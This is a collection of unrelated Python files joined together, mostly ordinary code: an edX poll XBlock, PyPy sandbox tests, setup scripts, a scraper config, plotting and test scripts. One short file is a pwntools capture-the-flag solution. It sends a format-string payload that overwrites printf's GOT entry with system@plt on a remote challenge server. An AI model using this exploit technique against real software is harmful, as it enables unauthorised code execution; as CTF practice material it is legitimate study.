help=_("The display name for this component."),
scope=Scope.settings
)
voted = Boolean(
help=_("Whether this student has voted on the poll"),
scope=Scope.user_state,
default=False
)
poll_answer = String(
help=_("Student answer"),
scope=Scope.user_state,
default=''
)
poll_answers = Dict(
help=_("Poll answers from all students"),
scope=Scope.user_state_summary
)
# List of answers, in the form {'id': 'some id', 'text': 'the answer text'}
answers = List(
help=_("Poll answers from xml"),
scope=Scope.content,
default=[]
)
question = String(
help=_("Poll question"),
scope=Scope.content,
default=''
)
resources_dir = None
uses_xmodule_styles_setup = True
preview_view_js = {
'js': [
resource_string(__name__, 'js/src/javascript_loader.js'),
resource_string(__name__, 'js/src/poll/poll.js'),
resource_string(__name__, 'js/src/poll/poll_main.js')
],
'xmodule_js': resource_string(__name__, 'js/src/xmodule.js'),
}
preview_view_css = {
'scss': [
resource_string(__name__, 'css/poll/display.scss')
],
}
    # There is no studio_view() for this XBlock but this is needed to make
    # the static_content command happy.
studio_view_js = {
'js': [],
'xmodule_js': resource_string(__name__, 'js/src/xmodule.js')
}
studio_view_css = {
'scss': []
}
def handle_ajax(self, dispatch, data): # lint-amnesty, pylint: disable=unused-argument
"""Ajax handler.
Args:
dispatch: string request slug
data: dict request data parameters
Returns:
json string
"""
if dispatch in self.poll_answers and not self.voted:
# FIXME: fix this, when xblock will support mutable types.
# Now we use this hack.
temp_poll_answers = self.poll_answers
temp_poll_answers[dispatch] += 1
self.poll_answers = temp_poll_answers
self.voted = True
self.poll_answer = dispatch
return json.dumps({'poll_answers': self.poll_answers,
'total': sum(self.poll_answers.values()),
'callback': {'objectName': 'Conditional'}
})
elif dispatch == 'get_state':
return json.dumps({'poll_answer': self.poll_answer,
'poll_answers': self.poll_answers,
'total': sum(self.poll_answers.values())
})
elif dispatch == 'reset_poll' and self.voted and \
self.xml_attributes.get('reset', 'True').lower() != 'false':
self.voted = False
# FIXME: fix this, when xblock will support mutable types.
# Now we use this hack.
temp_poll_answers = self.poll_answers
temp_poll_answers[self.poll_answer] -= 1
self.poll_answers = temp_poll_answers
self.poll_answer = ''
return json.dumps({'status': 'success'})
else: # return error message
return json.dumps({'error': 'Unknown Command!'})
def student_view(self, _context):
"""
Renders the student view.
"""
fragment = Fragment()
params = {
'element_id': self.location.html_id(),
'element_class': self.location.block_type,
'ajax_url': self.ajax_url,
'configuration_json': self.dump_poll(),
}
fragment.add_content(self.system.render_template('poll.html', params))
add_webpack_to_fragment(fragment, 'PollBlockPreview')
shim_xmodule_js(fragment, 'Poll')
return fragment
def dump_poll(self):
"""Dump poll information.
Returns:
string - Serialize json.
"""
        # FIXME: hack to work around `default={}` being cached when the
        # poll_answers field is defined
if self.poll_answers is None:
self.poll_answers = {}
answers_to_json = OrderedDict()
# FIXME: fix this, when xblock support mutable types.
# Now we use this hack.
temp_poll_answers = self.poll_answers
# Fill self.poll_answers, prepare data for template context.
for answer in self.answers:
# Set default count for answer = 0.
if answer['id'] not in temp_poll_answers:
temp_poll_answers[answer['id']] = 0
answers_to_json[answer['id']] = html.escape(answer['text'], quote=False)
self.poll_answers = temp_poll_answers
return json.dumps({
'answers': answers_to_json,
'question': html.escape(self.question, quote=False),
# to show answered poll after reload:
'poll_answer': self.poll_answer,
'poll_answers': self.poll_answers if self.voted else {},
'total': sum(self.poll_answers.values()) if self.voted else 0,
'reset': str(self.xml_attributes.get('reset', 'true')).lower()
})
_tag_name = 'poll_question'
_child_tag_name = 'answer'
@classmethod
def definition_from_xml(cls, xml_object, system):
"""Pull out the data into dictionary.
Args:
xml_object: xml from file.
system: `system` object.
Returns:
(definition, children) - tuple
definition - dict:
{
'answers': <List of answers>,
'question': <Question string>
}
"""
        # Check for presence of required tags in xml.
if len(xml_object.xpath(cls._child_tag_name)) == 0:
raise ValueError("Poll_question definition must include \
at least one 'answer' tag")
xml_object_copy = deepcopy(xml_object)
answers = []
for element_answer in xml_object_copy.findall(cls._child_tag_name):
answer_id = element_answer.get('id', None)
if answer_id:
answers.append({
'id': answer_id,
'text': stringify_children(element_answer)
})
xml_object_copy.remove(element_answer)
definition = {
'answers': answers,
'question': stringify_children(xml_object_copy)
}
children = []
return (definition, children)
def definition_to_xml(self, resource_fs):
"""Return an xml element representing to this definition."""
poll_str = HTML('<{tag_name}>{text}</{tag_name}>').format(
tag_name=self._tag_name, text=self.question)
xml_object = etree.fromstring(poll_str)
xml_object.set('display_name', self.display_name)
def add_child(xml_obj, answer): # lint-amnesty, pylint: disable=unused-argument
# Escape answer text before adding to xml tree.
answer_text = str(answer['text'])
child_str = Text('{tag_begin}{text}{tag_end}').format(
tag_begin=HTML('<{tag_name} id="{id}">').format(
tag_name=self._child_tag_name,
id=answer['id']
),
text=answer_text,
tag_end=HTML('</{tag_name}>').format(tag_name=self._child_tag_name)
)
child_node = etree.fromstring(child_str)
xml_object.append(child_node)
for answer in self.answers:
add_child(xml_object, answer)
return xml_object
|
import json
import jsonschema
from jsonschema import validate
import error
class ModelSelection(object):
# Constructor
def __init__(self, jsonFilePath, estimator):
self.cv = None
self.verbose = 0
try:
with open('schemas/msSchema.json') as schema_file:
cvSchema = json.load(schema_file)
except FileNotFoundError as err:
template = "An exception of type {0} occurred. Arguments: {1!r}"
message = template.format(type(err).__name__, err.args)
print(message)
raise ValueError(error.errors['modelselection_config'])
        if jsonFilePath is not None:
try:
with open(jsonFilePath) as json_file:
try:
jsonData = json.load(json_file)
validate(instance=jsonData, schema=cvSchema)
except jsonschema.exceptions.ValidationError as err:
template = "An exception of type {0} occurred. Arguments: {1!r}"
message = template.format(type(err).__name__, err.args)
print(message)
raise ValueError(error.errors['modelselection_config'])
except ValueError as err:
template = "An exception of type {0} occurred. Arguments: {1!r}"
message = template.format(type(err).__name__, err.args)
print(message)
raise ValueError(error.errors['modelselection_config'])
self.parse(jsonData, estimator)
except FileNotFoundError as err:
template = "An exception of type {0} occurred. Arguments: {1!r}"
message = template.format(type(err).__name__, err.args)
print(message)
raise ValueError(error.errors['modelselection_config'])
else:
self.assign_default_values(estimator)
def parse(self, jsonData, estimator):
if 'cv' in jsonData:
self.cv = jsonData['cv']
self.process_scoring_param(jsonData, estimator)
def process_scoring_param(self, jsonData, estimator):
import sklearn.metrics as metrics
if 'verbose' in jsonData:
self.verbose = jsonData['verbose']
if 'scoring' in jsonData:
self.scoring = jsonData['scoring']
if estimator.is_regr:
if self.scoring in ['mean_absolute_error', 'mean_squared_error', 'mean_squared_log_error']:
self.metrics = self.scoring
self.scoring = 'neg_' + self.scoring
elif self.scoring in ['root_mean_squared_error']:
self.metrics = 'mean_squared_error'
self.is_RMSE = True
self.scoring = 'neg_' + self.scoring
elif self.scoring in ['r2']:
self.metrics = self.scoring + '_score'
else:
raise ValueError(error.errors['unknown_scoring_attribute'] + ' ' + self.scoring)
else:
if self.scoring in ['accuracy', 'balanced_accuracy']: #, 'average_precision']:
self.metrics = self.scoring + '_score'
else:
sl = self.scoring.split('_')
if sl[0] in ['f1', 'precision', 'recall']:
self.metrics = sl[0] + '_score'
if len(sl)>1:
if sl[1] in ['micro', 'macro', 'samples', 'weighted']:
self.metrics_average = sl[1]
elif sl[1] == 'binary' and estimator.n_classes == 2:
self.metrics_average = 'binary'
elif estimator.n_classes == 2:
self.metrics_average = 'binary'
else:
self.metrics_average = 'weighted'
elif estimator.n_classes == 2:
self.metrics_average = 'binary'
else:
self.scoring = self.scoring + '_weighted'
self.metrics_average = 'weighted'
else:
raise ValueError(error.errors['unknown_scoring_attribute'] + ' ' + self.scoring)
else:
self.assign_default_values(estimator)
def assign_default_values(self, estimator):
self.scoring = None
if estimator.is_regr:
if estimator.nick == 'ann':
self.metrics = 'mean_squared_error' #'r2_score'
else:
self.metrics = 'r2_score'
else:
self.metrics = 'accuracy_score' |
import py
import sys, os, time
import struct
from pypy.rpython.lltypesystem import rffi
from pypy.translator.interactive import Translation
from pypy.translator.sandbox.sandlib import read_message, write_message
from pypy.translator.sandbox.sandlib import write_exception
def expect(f, g, fnname, args, result, resulttype=None):
    """Read one sandboxed external-call request from `f`, assert it matches
    the expected function name and arguments, then write `result` (or an
    exception) back to the subprocess via `g`."""
    msg = read_message(f, timeout=10.0)
assert msg == fnname
msg = read_message(f, timeout=10.0)
assert msg == args
if isinstance(result, Exception):
write_exception(g, result)
else:
write_message(g, 0)
write_message(g, result, resulttype)
g.flush()
def test_open_dup():
def entry_point(argv):
fd = os.open("/tmp/foobar", os.O_RDONLY, 0777)
assert fd == 77
fd2 = os.dup(fd)
assert fd2 == 78
return 0
t = Translation(entry_point, backend='c', standalone=True, sandbox=True)
exe = t.compile()
g, f = os.popen2(exe, "t", 0)
expect(f, g, "ll_os.ll_os_open", ("/tmp/foobar", os.O_RDONLY, 0777), 77)
expect(f, g, "ll_os.ll_os_dup", (77,), 78)
g.close()
tail = f.read()
f.close()
assert tail == ""
def test_read_write():
def entry_point(argv):
fd = os.open("/tmp/foobar", os.O_RDONLY, 0777)
assert fd == 77
res = os.read(fd, 123)
assert res == "he\x00llo"
count = os.write(fd, "world\x00!\x00")
assert count == 42
os.close(fd)
return 0
t = Translation(entry_point, backend='c', standalone=True, sandbox=True)
exe = t.compile()
g, f = os.popen2(exe, "t", 0)
expect(f, g, "ll_os.ll_os_open", ("/tmp/foobar", os.O_RDONLY, 0777), 77)
expect(f, g, "ll_os.ll_os_read", (77, 123), "he\x00llo")
expect(f, g, "ll_os.ll_os_write", (77, "world\x00!\x00"), 42)
expect(f, g, "ll_os.ll_os_close", (77,), None)
g.close()
tail = f.read()
f.close()
assert tail == ""
def test_dup2_access():
def entry_point(argv):
os.dup2(34, 56)
y = os.access("spam", 77)
return 1 - y
t = Translation(entry_point, backend='c', standalone=True, sandbox=True)
exe = t.compile()
g, f = os.popen2(exe, "t", 0)
expect(f, g, "ll_os.ll_os_dup2", (34, 56), None)
expect(f, g, "ll_os.ll_os_access", ("spam", 77), True)
g.close()
tail = f.read()
f.close()
assert tail == ""
def test_stat_ftruncate():
from pypy.rpython.module.ll_os_stat import s_StatResult
from pypy.rlib.rarithmetic import r_longlong
r0x12380000007 = r_longlong(0x12380000007)
def entry_point(argv):
st = os.stat("somewhere")
os.ftruncate(st.st_mode, st.st_size) # nonsense, just to see outside
return 0
t = Translation(entry_point, backend='c', standalone=True, sandbox=True)
exe = t.compile()
g, f = os.popen2(exe, "t", 0)
st = os.stat_result((55, 0, 0, 0, 0, 0, 0x12380000007, 0, 0, 0))
expect(f, g, "ll_os.ll_os_stat", ("somewhere",), st,
resulttype = s_StatResult)
expect(f, g, "ll_os.ll_os_ftruncate", (55, 0x12380000007), None)
g.close()
tail = f.read()
f.close()
assert tail == ""
def test_time():
def entry_point(argv):
t = time.time()
os.dup(int(t*1000))
return 0
t = Translation(entry_point, backend='c', standalone=True, sandbox=True)
exe = t.compile()
g, f = os.popen2(exe, "t", 0)
expect(f, g, "ll_time.ll_time_time", (), 3.141592)
expect(f, g, "ll_os.ll_os_dup", (3141,), 3)
g.close()
tail = f.read()
f.close()
assert tail == ""
def test_oserror():
def entry_point(argv):
try:
os.stat("somewhere")
except OSError, e:
os.close(e.errno) # nonsense, just to see outside
return 0
t = Translation(entry_point, backend='c', standalone=True, sandbox=True)
exe = t.compile()
g, f = os.popen2(exe, "t", 0)
expect(f, g, "ll_os.ll_os_stat", ("somewhere",), OSError(6321, "egg"))
expect(f, g, "ll_os.ll_os_close", (6321,), None)
g.close()
tail = f.read()
f.close()
assert tail == ""
class TestPrintedResults:
def run(self, entry_point, args, expected):
t = Translation(entry_point, backend='c', standalone=True,
sandbox=True)
exe = t.compile()
from pypy.translator.sandbox.sandlib import SimpleIOSandboxedProc
proc = SimpleIOSandboxedProc([exe] + args)
output, error = proc.communicate()
assert error == ''
assert output == expected
def test_safefuncs(self):
import math
def entry_point(argv):
a = float(argv[1])
print int(math.floor(a - 0.2)),
print int(math.ceil(a)),
print int(100.0 * math.sin(a)),
mantissa, exponent = math.frexp(a)
print int(100.0 * mantissa), exponent,
fracpart, intpart = math.modf(a)
print int(100.0 * fracpart), int(intpart),
print
return 0
self.run(entry_point, ["3.011"], "2 4 13 75 2 1 3\n")
def test_safefuncs_exception(self):
import math
def entry_point(argv):
a = float(argv[1])
x = math.log(a)
print int(x * 100.0)
try:
math.log(-a)
except ValueError:
print 'as expected, got a ValueError'
else:
print 'did not get a ValueError!'
return 0
self.run(entry_point, ["3.011"], "110\nas expected, got a ValueError\n")
def test_os_path_safe(self):
def entry_point(argv):
print os.path.join('tmp', argv[1])
return 0
self.run(entry_point, ["spam"], os.path.join("tmp", "spam")+'\n')
|
# -*- coding: utf-8 -*-
"""dzo package setup script.
"""
from os import path
from setuptools import setup, find_packages, Extension
from Cython.Build import cythonize
from Cython.Distutils import build_ext
import dzo
# License
# with open(path.join(path.dirname(path.abspath(__file__)), 'LICENSE')) as fp:
# LICENSE = fp.read().strip('\n')
# Literal
NAME = 'dzo'
AUTHOR = 'Moriaki Saigusa'
AUTHOR_EMAIL = '[email protected]'
LICENSE = 'MIT'
LONG_DESCRIPTION = 'Python implemented portable and easy-to-use search engine'
URL = 'https://github.com/moriaki3193/dzo'
KEYWORDS = 'Python Search Engine'
TEST_SUITE = 'tests'
ZIP_SAFE = False
# List
PACKAGES = find_packages(exclude=('tests',))  # one-element tuple, not a bare string
TESTS_REQUIRE = ['pytest', 'pytest-cov']
SETUP_REQUIRES = ['pytest-runner']
INSTALL_REQUIRES = ['Cython', 'numpy', 'scipy', 'mecab-python3', 'typing-extensions']
CLASSIFIERS = [
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.7',
]
# Dict
ENTRY_POINTS = {
'console_scripts': [
'dzo=dzo._cmd.__main__:main'
]
}
EXTRAS_REQUIRE = {
'dev': ['mypy', 'pylint', 'numpy-stubs']
}
# Commands
CMDCLASS = {'build_ext': build_ext}
# Cython extensions
EXT_DIR = path.join(path.dirname(path.abspath(__file__)), 'dzo', '_ext')
EXT_MODULES = [
Extension('dzo._ext.core', [path.join(EXT_DIR, 'core.pyx')]),
]
setup(
name=NAME,
version=dzo.__version__,
description=dzo.__doc__.strip(),
author=AUTHOR,
author_email=AUTHOR_EMAIL,
url=URL,
license=LICENSE,
packages=PACKAGES,
tests_require=TESTS_REQUIRE,
extras_require=EXTRAS_REQUIRE,
setup_requires=SETUP_REQUIRES,
install_requires=INSTALL_REQUIRES,
keywords=KEYWORDS,
classifiers=CLASSIFIERS,
entry_points=ENTRY_POINTS,
cmdclass=CMDCLASS,
test_suite=TEST_SUITE,
zip_safe=ZIP_SAFE,
ext_modules=cythonize(EXT_MODULES, language_level='3')
)
|
def Fig1():
datasets = []
GoodNames = ['MGRAST', 'HMP', 'EMPclosed', 'BBS', 'CBC', 'MCDB', 'GENTRY', 'FIA']
for name in os.listdir(mydir +'data/micro'):
|
# -*- coding: utf-8 -*-
# -- General configuration -----------------------------------------------------
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix of source filenames.
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = u"eNMS"
copyright = u"eNMS Automation"
# The short X.Y version.
version = "3.17.2"
# The full version, including alpha/beta/rc tags.
release = "3.17.2"
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ["_build"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = []
html_theme_options = {"navigation_depth": 4}
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "sphinx_rtd_theme" # winner, mobile friendly
# The style sheet to use for HTML pages. A file of that name must exist either
# in Sphinx’ static/ path, or in one of the custom paths given in
# html_static_path. Default is the stylesheet given by the selected theme.
html_style = "custom.css"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
|
#!/usr/bin/env python
from pwn import *
r = remote('bamboofox.cs.nctu.edu.tw', 22003)
# r = process('./binary_300')
system_plt = 0x8048410
printf_got = 0x804a00c
# Format-string attack: stage both halves of printf's GOT entry on the
# stack, then two %hn writes redirect printf to system@plt
# (high half 0x0804 first, then low half 0x8410).
fmt = p32(printf_got + 2) + p32(printf_got)
fmt += '%{}c%7$hn'.format(0x0804 - 8)  # 8 bytes (the two addresses) already printed
fmt += '%{}c%8$hn'.format(0x8410 - 0x0804)  # pad the cumulative count up to 0x8410
r.sendline(fmt)
r.interactive()
|
from setuptools import setup, find_packages
VERSION = '0.0.1'
DESCRIPTION = 'Python Environment Package Status'
LONG_DESCRIPTION = 'Python Environment Package Status helps determine the package versions in use ' \
                   'and how they compare, by version and timeline, to the latest/stable versions'
requirements = [
]
# Setting up
setup(
name="py_enviornment_status",
version=VERSION,
author="Vamsee Achanta",
author_email="<[email protected]>",
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
packages=find_packages(),
install_requires=[], # add any additional packages that
# needs to be installed along with your package. Eg: 'caer'
keywords=['python', 'first package'],
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Education",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Operating System :: MacOS :: MacOS X",
"Operating System :: Microsoft :: Windows",
]
) |
# Hongdou forum - Guangxi
TASK_NAME = 'bbs_gxnews'
# Start URL
START_URL = 'http://hongdou.gxnews.com.cn'
# Allowed domains; must be a list
DOMAIN = ['hongdou.gxnews']
# Request headers
HEADERS = {
'Host': 'hongdou.gxnews.com.cn',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
}
# XPath rules
XPATHER_HREF = ".//*/@href"
# Field template
# {
# "title": "",
# "news_date": "",
# "source": "",
# "author": "",
# "navigation": "",
# "content": "",
# "editor": "",
# "tags": ""
# },
XPATHER_NEWS_LIST = [
{
"title": "substring-after(substring-before(normalize-space(//*[contains(@class,'postbit')][1]//*[@class='thead']),'(您是'),'标题:')",
"news_date": "substring-before(substring-after(normalize-space(//*[contains(@class,'postbit')][1]//*[@width='230']),'发表于'),'第')",
"source": "",
"author": "normalize-space(.//*[contains(@class,'postbit')][1]//*[contains(@id,'postmenu')])",
"navigation": "translate(normalize-space(.//*[contains(text(),'您现在的位置')]),'您现在的位置::','')",
"content": "//*[contains(@class,'postbit')][1]//*[@class='viewmessage']/descendant::text()",
"editor": "",
"tags": ".//*[@name='keywords']/@content"
},
]
# Regex rule for static page URLs; pages whose URL matches this pattern
# (e.g. '/viewthread-123.shtml') will have their news content scraped
REGEX_URL = r'/viewthread-\d*\.s*html*'
# Response timeout
# TIMEOUT = 20
|
def run_case(filename):
with open(filename, 'r') as f:
groups = f.read().split('\n\n')
# P1
group_sum = sum([len(set(group.replace('\n', ''))) for group in groups])
print(f'Sum of group responses: {group_sum}')
# P2
num_yes_list = []
for group in groups:
all_yes = 0
num_people = group.count('\n') + 1
responses = group.replace('\n', '')
resp_set = set(responses)
for resp in resp_set:
if responses.count(resp) == num_people:
all_yes += 1
num_yes_list.append(all_yes)
print(f'Found sum: {sum(num_yes_list)} for num_yes_list: {num_yes_list}')
if __name__ == '__main__':
filenames = ['input-sample.txt', 'input-d6p1.txt']
for filename in filenames:
run_case(filename)
|
#T# the formula for the area of a trapezoid can be understood as the sum of the areas of the two triangles that appear when drawing one of its diagonals
#T# to draw the trapezoid with the two triangles, the pyplot module of the matplotlib package is used
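#T# as a check of that reasoning: diagonal BD splits the trapezoid into
#T# triangle BCD (base b, height h) and triangle ABD (base B, height h), so
#T# A = A_1 + A_2 = (1/2)*b*h + (1/2)*B*h = ((B + b)/2)*h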
import matplotlib.pyplot as plt
#T# create the figure and axes
fig1, ax1 = plt.subplots(1, 1)
#T# hide the spines and ticks
for it1 in ['top', 'bottom', 'left', 'right']:
ax1.spines[it1].set_visible(False)
ax1.get_xaxis().set_visible(False)
ax1.get_yaxis().set_visible(False)
#T# create the vertices of the trapezoid
A, B, C, D = [0, 0], [1, 3], [5, 3], [7, 0]
#T# join the vertices and one diagonal of the trapezoid
plt.plot([B[0], C[0], D[0], A[0], B[0], D[0]], [B[1], C[1], D[1], A[1], B[1], D[1]], color = '#000000')
#T# create the height guide
plt.plot([B[0], B[0]], [A[1], B[1]], '--', color = '#000000')
#T# set the math text font to the Latex default, Computer Modern
import matplotlib
matplotlib.rcParams['mathtext.fontset'] = 'cm'
#T# name the bases, the height, and the areas
plt.text((B[0] + C[0])/2, (B[1] + C[1])/2, r'$b$', ha = 'center', va = 'bottom', size = 18)
plt.text((A[0] + D[0])/2, (A[1] + D[1])/2 - 0.05, r'$B$', ha = 'center', va = 'top', size = 18)
plt.text(B[0] + 0.1, (A[1] + B[1])/2, r'$h$', ha = 'left', va = 'center', size = 18)
plt.text((B[0] + C[0] + D[0])/3, (B[1] + C[1] + D[1])/3, r'$A_1$', ha = 'center', va = 'center', size = 18)
plt.text((A[0] + B[0] + D[0])/3, (A[1] + B[1] + D[1])/3, r'$A_2$', ha = 'center', va = 'center', size = 18)
#T# show the result
plt.show() |
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2021 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version="1.0" encoding="UTF-8"?><xml>
<id/>
<version>3</version>
<name>TS_WIFIHAL_2.4GHzSetApSecuritySecondaryRadiusServer_NonEnterpriseMode</name>
<primitive_test_id/>
<primitive_test_name>WIFIHAL_GetOrSetParamStringValue</primitive_test_name>
<primitive_test_version>8</primitive_test_version>
<status>FREE</status>
<synopsis>Set Security Secondary Radius Server details with non-enterprise modes and check whether the return status is failure</synopsis>
<groups_id/>
<execution_time>5</execution_time>
<long_duration>false</long_duration>
<advanced_script>false</advanced_script>
<remarks/>
<skip>false</skip>
<box_types>
<box_type>Broadband</box_type>
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
</rdk_versions>
<test_cases>
<test_case_id>TS_WIFIHAL_531</test_case_id>
<test_objective>Set Security Secondary Radius Server details with non-enterprise modes and check whether the return status is failure</test_objective>
<test_type>Negative</test_type>
<test_setup>Broadband</test_setup>
<pre_requisite>1. CCSP components should be in a running state; otherwise invoke cosa_start.sh manually, which starts all the CCSP components and the TDK component
2. The TDK agent should be in a running state, or invoke it through the StartTdk.sh script</pre_requisite>
<api_or_interface_used>wifi_getApSecurityModeSupported()
wifi_setApSecuritySecondaryRadiusServer()
wifi_getApSecurityModeEnabled()
wifi_setApSecurityModeEnabled()</api_or_interface_used>
<input_parameters>methodname : getApSecurityModeSupported
methodName : setApSecuritySecondaryRadiusServer
methodName : getApSecurityModeEnabled
methodName : setApSecurityModeEnabled
radioIndex : 0</input_parameters>
<automation_approch>1. Load wifihal module
2. Using WIFIHAL_GetOrSetParamStringValue invoke wifi_getApSecurityModeSupported() and get the supported security modes.
3. Using WIFIHAL_GetOrSetParamStringValue invoke wifi_getApSecurityModeEnabled() and save the initial value.
4. Set the security modes to Non Enterprise modes from the supported modes list by invoking the API wifi_setApSecurityModeEnabled(). Cross verify the set operation by invoking wifi_getApSecurityModeEnabled() API.
5. For each Non Enterprise mode, try to set the Security Radius Server details by invoking wifi_setApSecuritySecondaryRadiusServer(). Check if the Set operation returns Failure as expected.
6. Revert back to initial Security mode
7. Unload Wifihal module.</automation_approch>
<expected_output>Security Secondary Radius Server details set with non-enterprise modes should return failure</expected_output>
<priority>High</priority>
<test_stub_interface>Wifihal</test_stub_interface>
<test_script>TS_WIFIHAL_2.4GHzSetApSecuritySecondaryRadiusServer_NonEnterpriseMode</test_script>
<skipped>No</skipped>
<release_version>M87</release_version>
<remarks/>
</test_cases>
<script_tags/>
</xml>
'''
def GetorSetApSecurityRadiusServer(obj, primitive, radioIndex, IPAddress, port, RadiusSecret, methodname):
    #Primitive test case which is associated with this script
tdkTestObj = obj.createTestStep(primitive);
#Radio index is 0 for 2.4GHz and 1 for 5GHz
tdkTestObj.addParameter("radioIndex",radioIndex);
tdkTestObj.addParameter("methodName", methodname);
tdkTestObj.addParameter("IPAddress", IPAddress);
tdkTestObj.addParameter("port", port);
tdkTestObj.addParameter("RadiusSecret", RadiusSecret);
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
return (tdkTestObj, actualresult, details);
def setSecondaryRadiusServer(idx, setMode) :
expectedresult = "FAILURE";
radioIndex = idx;
setMethod = "setApSecuritySecondaryRadiusServer"
primitive = "WIFIHAL_GetOrSetSecurityRadiusServer"
IPAddress = "1.1.2.2"
port = 1234
RadiusSecret = "12345"
#Calling the method to execute wifi_setApSecuritySecondaryRadiusServer()
tdkTestObj, actualresult, details = GetorSetApSecurityRadiusServer(obj, primitive, radioIndex, IPAddress, port, RadiusSecret, setMethod)
print "Set values: IPAddress = 1.1.2.2, port = 1234, RadiusSecret = 12345"
print "TEST STEP : Should not set the ApSecuritySecondaryRadiusServer details in the Non Enterprise mode %s"%setMode
print "EXPECTED RESULT : Should not set the IPAddress, port and RadiusSecret"
if expectedresult in actualresult :
tdkTestObj.setResultStatus("SUCCESS");
print "ACTUAL RESULT : IPAddress, port and RadiusSecret are not set successfully in the Non Enterprise mode"
print "TEST EXECUTION RESULT : SUCCESS"
else :
tdkTestObj.setResultStatus("FAILURE");
print "ACTUAL RESULT : IPAddress, port and RadiusSecret are set successfully in the Non Enterprise mode"
print "TEST EXECUTION RESULT : FAILURE"
# use tdklib library, which provides a wrapper for tdk testcase scripts
import tdklib;
from wifiUtility import *;
radio = "2.4G"
#Test component to be tested
obj = tdklib.TDKScriptingLibrary("wifihal","1");
#IP and Port of box, no need to change;
#these will be replaced with the corresponding box IP and port while executing the script
ip = <ipaddress>
port = <port>
obj.configureTestCase(ip,port,'TS_WIFIHAL_2.4GHzSetApSecuritySecondaryRadiusServer_NonEnterpriseMode');
loadmodulestatus =obj.getLoadModuleResult();
print "[LIB LOAD STATUS] : %s" %loadmodulestatus
if "SUCCESS" in loadmodulestatus.upper():
obj.setLoadModuleStatus("SUCCESS");
tdkTestObjTemp, idx = getIndex(obj, radio);
    ## Check if an invalid index is returned
if idx == -1:
print "Failed to get radio index for radio %s\n" %radio;
tdkTestObjTemp.setResultStatus("FAILURE");
else:
expectedresult="SUCCESS";
apIndex = idx;
getMethod = "getApSecurityModesSupported"
primitive = 'WIFIHAL_GetOrSetParamStringValue'
#Calling the method to execute wifi_getApSecurityModeSupported()
tdkTestObj, actualresult, details = ExecuteWIFIHalCallMethod(obj, primitive, apIndex, "0", getMethod)
if expectedresult in actualresult:
supportedModes = details.split(":")[1].strip()
supportedModes = supportedModes.split(',')
expectedresult="SUCCESS";
apIndex = idx;
getMethod = "getApSecurityModeEnabled"
primitive = 'WIFIHAL_GetOrSetParamStringValue'
#Calling the method to execute wifi_getApSecurityModeEnabled()
tdkTestObj, actualresult, details = ExecuteWIFIHalCallMethod(obj, primitive, apIndex, "0", getMethod)
if expectedresult in actualresult:
initMode = details.split(":")[1].strip()
if initMode in supportedModes:
tdkTestObj.setResultStatus("SUCCESS");
print "Initial ApSecurityMode is from the supported modes"
NonEnterpriseModes = list(filter(lambda x: 'Personal' in x, supportedModes))
print "Setting and checking the Non Enterprise security modes : ",NonEnterpriseModes
for setMode in NonEnterpriseModes :
print "Setting the ApSecurityMode to ",setMode
expectedresult="SUCCESS";
apIndex = idx;
setMethod = "setApSecurityModeEnabled"
primitive = 'WIFIHAL_GetOrSetParamStringValue'
#Calling the method to execute wifi_setApSecurityModeEnabled()
tdkTestObj, actualresult, details = ExecuteWIFIHalCallMethod(obj, primitive, apIndex, setMode, setMethod)
if expectedresult in actualresult:
expectedresult="SUCCESS";
apIndex = idx;
getMethod = "getApSecurityModeEnabled"
primitive = 'WIFIHAL_GetOrSetParamStringValue'
#Calling the method to execute wifi_getApSecurityModeEnabled()
tdkTestObj, actualresult, details = ExecuteWIFIHalCallMethod(obj, primitive, apIndex, "0", getMethod)
if expectedresult in actualresult:
finalMode = details.split(":")[1].strip()
if finalMode == setMode:
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP: Compare the set and get values of ApSecurityModeEnabled"
print "EXPECTED RESULT: Set and get values of ApSecurityModeEnabled should be same"
print "ACTUAL RESULT: Set and get values of ApSecurityModeEnabled are the same"
print "setMode = ",setMode
print "getMode = ",finalMode
print "TEST EXECUTION RESULT : SUCCESS"
setSecondaryRadiusServer(idx, setMode);
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP: Compare the set and get values of ApSecurityModeEnabled"
print "EXPECTED RESULT: Set and get values of ApSecurityModeEnabled should be same"
print "ACTUAL RESULT: Set and get values of ApSecurityModeEnabled are NOT the same"
print "setMode = ",setMode
print "getMode = ",finalMode
print "TEST EXECUTION RESULT : FAILURE"
else:
tdkTestObj.setResultStatus("FAILURE");
print "wifi_getApSecurityModeEnabled() call failed after set operation"
print "TEST EXECUTION RESULT : FAILURE"
else:
tdkTestObj.setResultStatus("FAILURE");
